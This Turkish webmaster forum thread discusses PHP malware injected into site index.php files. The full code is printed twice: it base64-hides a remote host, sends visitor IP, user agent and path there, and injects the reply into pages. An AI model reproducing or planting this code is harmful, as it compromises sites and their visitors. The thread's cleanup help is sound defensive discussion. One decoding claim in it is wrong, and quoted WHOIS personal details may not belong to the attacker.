sitem JS/Iframe.AS virüs uyarısı veriyor. - Google Fan Webmaster Forum
Google Fan Webmaster Forum  
herşeyi sana yazdım

Geri git   Google Fan Webmaster Forum > Hi Tech & Teknoloji Güncel > Güvenlik
KEY
Kayıt ol Articles Sosyal Gruplar Forumları Okundu Kabul Et

Güvenlik Virus worm spyware security protection, en son çıkan açıklar ve yamaları, güvenlik dünyasından en son haberler.

Cevapla
 
LinkBack Seçenekler
  1  
Alt 19-12-2011, 12:45:48
 
Standart sitem JS/Iframe.AS virüs uyarısı veriyor.

siteme girdiğimde nod32 antivürüs uyarısı verdi. sitemi karantinaya aldı. hosttaki dosyaları incediğimde tüm index.php isimli dosyaların en altına aşağıdaki kod eklenmişti.

Kod:
<?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
her dosyayı tek tek temizledim. bu kodlar ne işe yarar. nereden nasıl bu kodlar dosyalara işlenmiş. bu durumdan nasıl kurtulurum ve bi daha olmaması için ne yapmalıyım.
__________________
Güzel Gören, Güzel Düşünür; Güzel Düşünen, Hayatından Lezzet Alır.
Alıntı ile Cevapla
  2  
Alt 19-03-2012, 10:16:59
 
Standart

Konu hakkında yardımcı olabilirmisiniz acaba. Yeni reseller hesabıma siteleri taşımaya başladım hatta sıfırdan kurduğum sitelerde var hepsinin index.php dosyasına alttaki kodlar eklenmekte siliyorum tekrar ekleniyor.

SMF sitem opencart sitem mevcut ve 2 sin dede aynı sorun var.

Ne yapmam lazım neden kaynaklanıyor olabilir.

PHP- Kodu:
<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
$sResult = [MENTION=53427]Curl[/MENTION]_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
Alıntı ile Cevapla
  3  
Alt 19-03-2012, 14:59:16
Üyeliği durduruldu
 
Standart

sorunun aynısı 2 gün önce başıma geldi.
Bu konu hakkında bir makale yazmıştım : http://www.hptimi.com/looks-for-goog...unu-temizleme/
ssh üzerinden aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA kodunu arattım. Bu kodun geçtiği dosyaları temizledim ve geri sunucuya yükledim. Ayrıca dosyalara 644 chmod izni verdim. Son olarak da ftp şifremi değiştirip format attım

Konu develiweb tarafından (19-03-2012 Saat 15:09:33 ) değiştirilmiştir..
Alıntı ile Cevapla
  4  
Alt 19-03-2012, 15:18:53
 
Standart

Bunu yapan her kimse siteler üzerinden zombi oluşturuyor bir nevi botnet agı gibi birşey

http://adveconfirm.com/ Saldırgan olarak bildirilmiş site!

http://adveconfirm.com/stat/stat.php buradan kontrol saglıyor.

Bots vs Browsers - Public Bots and User Agents Database and Commentary
Arama motorları vs Tarayıcılar - Kamu Arama motorları ve Kullanıcı Ajanlar Veritabanı vs vs.

Bunu yapanda bir rus sanırım. Free hosting kullanıyor
Alıntı ile Cevapla
  5  
Alt 19-03-2012, 20:39:38
Üyeliği durduruldu
 
Standart

Alıntı:
Queen Nickli Üyeden Alıntı Mesajı göster
Bunu yapan her kimse siteler üzerinden zombi oluşturuyor bir nevi botnet agı gibi birşey

http://adveconfirm.com/ Saldırgan olarak bildirilmiş site!

http://adveconfirm.com/stat/stat.php buradan kontrol saglıyor.

Bots vs Browsers - Public Bots and User Agents Database and Commentary
Arama motorları vs Tarayıcılar - Kamu Arama motorları ve Kullanıcı Ajanlar Veritabanı vs vs.

Bunu yapanda bir rus sanırım. Free hosting kullanıyor
botnet gibi şeyler için kullandırmıyor, ama ne için kullandırdığını da çözebilmiş değilim. Bu kodun olduğu siteye giren kişi adveconfirm.com sitesine de giriyor tabi haberi olmadan, ayrıca istatistiğe kayıt ettiriyor amacı nedir kim bilir
Alıntı ile Cevapla
  6  
Alt 19-03-2012, 21:52:48
 
Standart

Alıntı:
develiweb Nickli Üyeden Alıntı Mesajı göster
botnet gibi şeyler için kullandırmıyor, ama ne için kullandırdığını da çözebilmiş değilim. Bu kodun olduğu siteye giren kişi adveconfirm.com sitesine de giriyor tabi haberi olmadan, ayrıca istatistiğe kayıt ettiriyor amacı nedir kim bilir
Sonuç olarak stat/stat.php var online kullanıcılara birşeyler yaptırdıgı kesin zaten.
Alıntı ile Cevapla
  7  
Alt 16-04-2012, 12:57:24
 
Standart

arkadaşlar dediklerinizi uyguladım aynı kod bendede vardı dünde farklı bir virüs vardı bakalım ben ilk başta ilk açılıştaki sayfadaki scripti alıntı yapmıştım ordan geliyor diye düşünmüştüm ama iframe çıktı dediklerinizi uyguladım şimdi bilgisayara format atıcam inş. kurtulurum bu virüsten yardımlarınız için teşekkür ederim bu arada sorunu düzelten arkadaşlar birdaha virüs bulaştımı onu yazarlarsa çok güzel olur
Alıntı ile Cevapla
  8  
Alt 16-04-2012, 13:27:18
WTF WTF isimli üye çevrimiçidir (Online)
 
Standart

PHP- Kodu:
  $stCurlLink base64_decode'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); 

de aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw base64 decode edersek http://hotlogupdate.com/stat/stat.php çıkıyor

hotlogupdate.com domani bizcn.com üzerinden alınmış ve NS adresi qwkspspl.com.

qwkspspl.com domani de bizcn.com üzerinden alınmış NS leri qwkspspl.com yine.

hotlogupdate sahibi qwkspspl sahibi aynı kişi whoisde
Alıntı:
Yulia Gaydukova
+74956173849 fax: +74956173849
Ul.Krylatskiye holmi, dom 33, korp.2, kv.264
Moscow Moscow region 183945
ru
Yazıyor ama bu bilği ne kadar doğru tartışılır başka birinin bilğileridir %99 bu işi yapan kişi kendi bilğilerini verceğini sanmıyorum.

Neyse verdiğiniz kod
  • Server IP sini
  • Tarayıcı Bilğisini
  • Alan Adını
  • Dosyanın Konumunu

http://hotlogupdate.com/stat/stat.php

yollluyor

Daha sonra da botsvsbrowsers.com sitesinde de Crome dan şukar kişi ziyaret etmiş gibisinden adam genel bir istatisik topluyor kod içerisinde bot net yapısı yok sadece bilği topluyor o da adamın sitesinde yayınlanıyor. botsvsbrowsers.com da MAXIMUMASP.COM da barındırılıyor

Şimdi Yapılması gerekenler
1- Bu gibi durumlarda ICANN ilk önce Registart a bildirilmesini söylüyor yani abuse@bizcn.com mail atıp Domain'in kapatılma talebi gönderilmeli
2- info@us-cert.gov e bilği vermek
3- MAXIMUMASP hosting e durum bildirilmeli
__________________
Die Or Kill Oyunumuz artık Android Market' te! Tamamen ÜCRETSİZ> İyi Eglenceler
Alıntı ile Cevapla
Cevapla


Bookmarks

Seçenekler

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Açık



Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 00:32:51.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

“İnsanların en hayırlısı, insanlara faydalı olandır”. H.Ş

Hosting by Radore Hosting

İçerik sağlayacı paylaşım sitelerinden biri olan R10.net WebMaster Forum Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. R10.net hakkında yapılacak tüm hukuksal Şikayetler adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde R10.net yönetimi olarak tarafımızdan gereken işlemler yapılacak ve Avukatlarımız size dönüş yapacaktır.
ARGUS_OK

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252